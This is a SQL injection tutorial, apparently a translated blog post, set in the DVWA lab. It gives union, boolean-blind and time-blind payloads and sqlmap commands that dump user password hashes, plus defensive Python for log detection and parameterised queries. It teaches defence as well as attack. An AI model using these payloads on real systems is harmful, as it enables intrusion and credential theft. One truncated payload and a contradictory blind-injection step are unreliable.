SQL injection for penetration testing

SQL injection (part one)

theory:

1. SQL language:

Structured Query Language (SQL) is a database query and programming language used to access data and to query, update and manage relational database systems.

Commonly used statements:
insert: insert into <table name> (<column names>) values (<column values>)
delete: delete from <table name> [where <delete condition>]
update: update <table name> set <column name>=<new value> [where <update condition>]
select: select <column names> from <table name> [where <query condition>]

2. SQL injection

By inserting SQL commands into a web form, a domain-name query string or a page request, the attacker tricks the server into executing malicious SQL commands.

SQL injection travels over the normal HTTP service port, so on the surface it looks no different from ordinary web access; it is highly covert and hard to detect.

3. How SQL injection works:

The attacker sends a specially constructed query statement to the web server. The server builds a dynamic query from it, and the database returns whatever the query asks for. The server then passes the returned database information straight back to the attacker.

4. Conditions for a SQL injection vulnerability

The user can control the input data, and the original SQL code to be executed is spliced together with that user input.

5. How SQL injection is carried out:

a. SQL query statement
select * from news where id=1
Normally this means: query the record with id 1 in the news table.
b. SQL injection
Malicious code is appended and the statement is reconstructed:
select * from news where id=1 or 1=1
If all records in the table are returned, an injection point exists.

c. Query the database:
splice query statements together through union and other methods to obtain database information, for example the administrator account and password.

d. The id value undergoes no validity check, which is what makes the above possible.

6. The harm of SQL injection:

Database information leakage
Web page tampering
Website malware implantation (drive-by download)
Malicious operation of the database
Remote control of the server
Destruction of hard disk data

7. SQL injection classification:

By injection point type: numeric injection, character injection
Numeric type: the injection point is a number (no quotes are needed to close the statement)
Common URL form: http://xxxx.com/sqli.php?id=1
Internal SQL statement: select * from <table name> where id = ($id)

Character type: the injection point is a string, so it must be closed with single quotation marks.
Common URL form: http://xxxx.com/sqli.php?name=fcfc
Internal SQL statement: select * from <table name> where name = '($name)'

By injection point location:
GET injection: the injection point is in a GET parameter
POST injection: the injected field is in the POST data (usually a form submission or product query)
Cookie injection: the injected field is in the cookie data
Search injection: the injection point is the search field (also a form of POST injection)
HTTP header injection: the injection point is in a field of the HTTP header

Other forms:
Pseudo-static injection
Base64 injection
Second-order injection
XML entity injection
phpcmsv9 authkey injection

By page return result:
With echo:
Error-based injection: use count(*), rand() and group by to construct an error-raising query
Union injection: use a union query to retrieve all the wanted data

Without echo:
Boolean-based blind injection: obtain the needed information by constructing logical conditions
Time-based blind injection: use the sleep() function and observe differences in the web application's response time

SQL manual injection (basic)

Experimental environment:
DVWA

Actual combat:

1. Configure DVWA:
open DVWA, select DVWA Security and set the security level to low.

2. Test the SQL injection point

1. Click SQL Injection to enter the test page

2. Try entering a single quote; if an error is reported, the page may contain an injection point

3. Enter 1' or '1'='1. If all data is returned, the user input is not controlled.

4. Guess the number of fields in the SQL statement:
' or 1=1 order by 1#
' or 1=1 order by 2#
' or 1=1 order by 3#
If order by 3 reports an error, the number of fields is 2

5. Determine the order of the displayed fields:
1' union select 1,2#

6. Get the current database name:
1' union select 1,database()#

7. Get the table names in the database:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

8. Get the field names in the users table:
' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

9. Get the data in the table:
' union select group_concat(user_id,user),group_concat(password) from users#

10. Look up the MD5 value of the user password with a tool or an online lookup service

SQL manual injection (intermediate)

Experimental environment:
DVWA: security level set to medium
Burp Suite: under Proxy, open the options tab and add the proxy listener interface
Browser: configure it to use the proxy (the steps differ by browser)

Actual combat:
1. Turn on Intercept in Burp, then submit any parameter on the test page; the intercepted request appears in Burp. Change the id= parameter to 1 or 1=1, click Forward under Proxy > Intercept and return to the test page. If data is returned and the query succeeds, a numeric injection vulnerability exists.
If setting the id parameter to ' or '1'='1 makes the query succeed, a character injection vulnerability exists.

2. Use Burp Suite to guess the number of fields in the SQL query statement.
After capturing the request, append the following to the id value one at a time until the number of fields is found.
order by 1 #
order by 2 #
order by 3 #

3. Use Burp Suite to determine the order of the displayed fields.
After capturing the request, append the statement to the id value:
union select 1,2 #

4. Use Burp Suite to get the current database name.
Append the statement to the id value of the captured request:
union select 1,database() #

5. Use Burp Suite to get the table names in the current database.
Append the statement to the id value of the captured request:
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

6. Use Burp Suite to get the field names in the users table.
Open the Decoder tab in Burp Suite, enter users and choose the HTML option under Encode as to obtain the hexadecimal value of the string users (the medium level escapes quotation marks, so the table name is supplied as a hex literal instead of 'users'). Then append the statement to the id value of the captured request:
union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

7. Use Burp Suite to get the data in the table.
Append the statement to the id value of the captured request:
union select group_concat(user_id,user),group_concat(password) from users #

SQL manual injection (advanced)

Experimental environment:
DVWA

Actual combat:
1. Open DVWA and set the security level to high

2. Enter 1' or 1=1# on the page; if the query succeeds, a character injection vulnerability exists

3. Guess the number of fields in the query statement:
1' or 1=1 order by 1 #
1' or 1=1 order by 2 #
1' or 1=1 order by 3 #

4. Determine the order of the displayed fields:
1' union select 1,2 #

5. Get the database name:
1' union select 1,database() #

6. Get the table names:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

7. Get the field names in the users table:
1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
(0x7573657273 is the hexadecimal representation of 'users')

8. Get the data in the table:
1' or 1=1 union select group_concat(user_id,user),group_concat(password) from users #

9. Look up the obtained password hashes with a tool.

SQL blind injection

Blind injection: during SQL injection, the result of the selected SQL statement is not echoed to the front end, so special methods are needed to judge or probe the result. This process is called blind injection.

Boolean-based blind injection

Construct conditions with "and" in the SQL statement so that the page reflects a true or false result

The experimental environment
DVWA, security level set to low

Actual combat:
1. Open SQL Injection (Blind) to enter the test page

2. Submit 1' and 1=1 #: the page reports that the record exists. Submit 1' and 1=2 #: the page reports that it does not exist.
This basically confirms that an injection point exists

3. Guess the length of the database name:
1' and length(database())=1 # //Display does not exist
1' and length(database())=2 # //Display does not exist
1' and length(database())=3 # //Display does not exist
1' and length(database())=4 # //Display exists, so the name is 4 characters long

4. Guess the database name by binary search:
1' and ascii(substr(database(),1,1))<100 # //Display does not exist
1' and ascii(substr(database(),1,1))>100 # //Display does not exist
(neither side matches, so the first character has ASCII code 100, i.e. 'd'.)
Modify the second parameter of substr in this command, for example substr(database(),2,1), to obtain the second letter of the database name.

5. Guess the number of database tables:
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 # //Display does not exist

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 # //Display exists, so there are two tables

6. Guess the length of the database table names:
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # //Display does not exist

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # //Display exists

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=5 # //Display exists

7. Guess the name of the database table
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # //Display does not exist

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # //Display does not exist

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 # //Display exists

Repeat these steps to guess all table names

8. Guess the number of fields in the database table:
1' and (select count(column_name) from information_schema.columns where table_name='users')=1 #

1' and (select count(column_name) from information_schema.columns where table_name='users')=8 #

9. Guess the field names in the database table
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))<117 # //Display does not exist

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>117 # //Display does not exist

10. Guess the data in the table:
1' and (select count(first_name) from users)=5 # //Display exists, so the users table holds 5 records
Guess the length of each record; the first first_name value is 5 characters long:
1' and length(substr((select first_name from users limit 0,1),1))=5 # //Display exists

11. Guess the data in the table by binary search:

1' and ascii(substr((select first_name from users limit 0,1),1,1))<97 #
1' and ascii(substr((select first_name from users limit 0,1),1,1))>97 #
1' and ascii(substr((select first_name from users limit 0,1),1,1))=97 #

Time-based blind injection:

Based on response-time delays

The experimental environment
DVWA, security level set to low

Actual combat:
1. Open SQL Injection (Blind) to enter the test page

2. Submit 1 and sleep(5) #: the page is not delayed.
Submit 1' and sleep(5) #: the page is noticeably delayed.
So this is a character-type time-based blind injection.

3. Guess the length of the database name
1' and if(length(database())=1,sleep(5),1)# //No delay

1' and if(length(database())=4,sleep(5),1)# //Delay, so the database name is 4 characters long

4. Guess the database name by binary search
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# //Noticeable delay
1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# //No delay
1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# //No delay

Modify the second parameter of substr in this command, for example substr(database(),2,1), to obtain the second letter of the database name.

5. Guess the number of database tables
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)# //No delay

1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)# //Delay, so there are two tables

6. Guess the length of the table name
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1)# //No delay

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1)# //Delay

7. Guess the name of the database table:

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103,sleep(5),1)# //No delay

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103,sleep(5),1)# //Delay

8. Guess the number of fields in the database table
1' and if((select count(column_name) from information_schema.columns where table_name='users')=1,sleep(5),1)# //No delay

1' and if((select count(column_name) from information_schema.columns where table_name='users')=8,sleep(5),1)# //Delay

9. Guess the field names in the database table

1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))<117,sleep(5),1)# //No delay

1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>117,sleep(5),1)# //No delay

10. Guess the data in the table:
1' and if((select count(first_name) from users)=5,sleep(5),1)# //Noticeable delay, so the users table holds 5 records
Guess the length of each record; the first first_name value is 5 characters long:
1' and if(length(substr((select first_name from users limit 0,1),1))=5,sleep(5),1)# //Delay

11. Guess the data in the table by binary search
1' and if(ascii(substr((select first_name from users limit 0,1),1,1))>97,sleep(5),1)# //No delay
1' and if(ascii(substr((select first_name from users limit 0,1),1,1))<,sleep(5),1)# //No delay
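From the defender's side, the payload shapes used in the union, boolean-blind and time-blind steps above are what a WAF or log-review rule looks for. The following Python is an added example, not part of the original post: it parses constructed Apache-style access-log lines, URL-decodes each query parameter and classifies it against a small ordered signature list; the log lines, signature names and regexes are my own constructions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines in Apache combined format (not real traffic): a benign
# request, then the union, boolean-blind, time-blind and tautology shapes used above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2021:10:00:01 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532
10.0.0.5 - - [10/Jan/2021:10:00:07 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+union+select+1%2Cdatabase%28%29%23&Submit=Submit HTTP/1.1" 200 1601
10.0.0.5 - - [10/Jan/2021:10:00:12 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3C100+%23&Submit=Submit HTTP/1.1" 200 1420
10.0.0.5 - - [10/Jan/2021:10:00:19 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=1%27+and+if%28length%28database%28%29%29%3D4%2Csleep%285%29%2C1%29%23&Submit=Submit HTTP/1.1" 200 1420
10.0.0.5 - - [10/Jan/2021:10:00:25 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 2210
"""

# Ordered (category, pattern) list; the first match wins, so the most specific shapes come first.
SIGNATURES = [
    ("time_blind",    re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("union",         re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("boolean_blind", re.compile(r"\b(and|or)\b.*\b(ascii|substr|substring|length|count)\s*\(")),
    ("tautology",     re.compile(r"\b(and|or)\s+'?\w+'?\s*=\s*'?\w+'?")),
    ("schema_probe",  re.compile(r"information_schema\.")),
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def normalize(value):
    # parse_qsl already decoded once; decode again to catch double-encoded payloads,
    # then lower-case and collapse whitespace so the signatures see one canonical form.
    return re.sub(r"\s+", " ", unquote_plus(value)).lower()

def classify_value(value):
    text = normalize(value)
    for name, pattern in SIGNATURES:
        if pattern.search(text):
            return name
    return None

def scan_line(line):
    """Return [(parameter, category), ...] for each suspicious query parameter in a log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = []
    for key, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        category = classify_value(value)
        if category:
            hits.append((key, category))
    return hits

def scan_log(text):
    # (line number, hits) for every line that carries at least one suspicious parameter.
    return [(n, h) for n, line in enumerate(text.splitlines(), 1) if (h := scan_line(line))]
```

The signatures are deliberately narrow; in production a rule like this is a triage aid next to the WAF and IDS/IPS controls listed under prevention, not a replacement for parameterised queries.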

sqlmap tool injection:

Test environment:
DVWA
Kali

Actual combat:
1. Run sqlmap in Kali with the command sqlmap -u <target address>; the target redirects straight to the login page.

2. Inspect the page with the browser's developer tools; the request header shows the browser's current cookie value

3. Add the --cookie parameter and build the following command
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5"

sqlmap then repeatedly asks Y/N questions that must be answered manually

4. After adding the --batch parameter, sqlmap fills in the default answers automatically and runs to completion.
It finds a union-query injection point
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch

5. Get database information
Add the --dbs parameter
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch --dbs

6. Get the table names in the database
Use -D <database> to select the database and --tables to list all tables in it
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch -D dvwa --tables

7. Get the field names in the users table
Use -D <database> -T <table> --columns to enumerate all field information in the table
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch -D dvwa -T users --columns

8. Get the data in the table.
Obtain the user and password columns with the following command:
-D <database> -T <table> -C <columns> --dump dumps the entries of the DBMS table

sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch -D dvwa -T users -C user_id,user,password --dump

SQL injection prevention:

1. Database security hardening, WAF, IDS/IPS
2. Strictly escape and filter user input
3. Use parameterized queries
4. PDO prepared statements. Without prepared statements, the web server splices the SQL statement together itself before sending it for execution, so dangerous SQL fragments in the input become part of the statement. With a PDO prepared statement, MySQL assembles the statement itself: even if the input carries dangerous SQL, it is passed in only as a parameter value and is never spliced into the SQL statement, which prevents SQL injection.
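To make the point of section 5 and of prevention items 3 and 4 concrete in runnable form, here is an added example (not code from the original post or from DVWA) using Python's built-in sqlite3 module in place of PHP PDO/MySQL: the spliced queries behave exactly as the text describes for "1 or 1=1", a union payload and the character-type "' or '1'='1", while the parameterised versions treat the same input as an ordinary value. The tables, rows and placeholder hashes are constructed for the demo.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's news and users tables (not DVWA's real schema).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table news (id integer primary key, title text)")
    con.executemany("insert into news (id, title) values (?, ?)",
                    [(1, "first"), (2, "second"), (3, "third")])
    con.execute("create table users (user_id integer, user text, password text)")
    con.executemany("insert into users values (?, ?, ?)",
                    [(1, "admin", "HASH-PLACEHOLDER-1"), (2, "gordonb", "HASH-PLACEHOLDER-2")])
    return con

def vulnerable_numeric(con, user_id):
    # Numeric-type splice, the page's 'select * from news where id=($id)': raw input becomes SQL.
    return con.execute(f"select id, title from news where id={user_id}").fetchall()

def vulnerable_character(con, title):
    # Character-type splice, "where name='($name)'": a quote in the input closes the literal.
    return con.execute(f"select id, title from news where title='{title}'").fetchall()

def safe_numeric(con, user_id):
    # Parameterised: the driver sends the value separately, so it is never parsed as SQL.
    return con.execute("select id, title from news where id=?", (user_id,)).fetchall()

def safe_character(con, title):
    return con.execute("select id, title from news where title=?", (title,)).fetchall()

def safe_numeric_validated(con, user_id):
    # Validation on top of parameterisation (prevention items 2 and 3): the id must be an
    # integer, so '1 or 1=1' is rejected by int() with ValueError before any query is built.
    return safe_numeric(con, int(user_id))
```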

Origin blog.csdn.net/weixin_45380284/article/details/107664117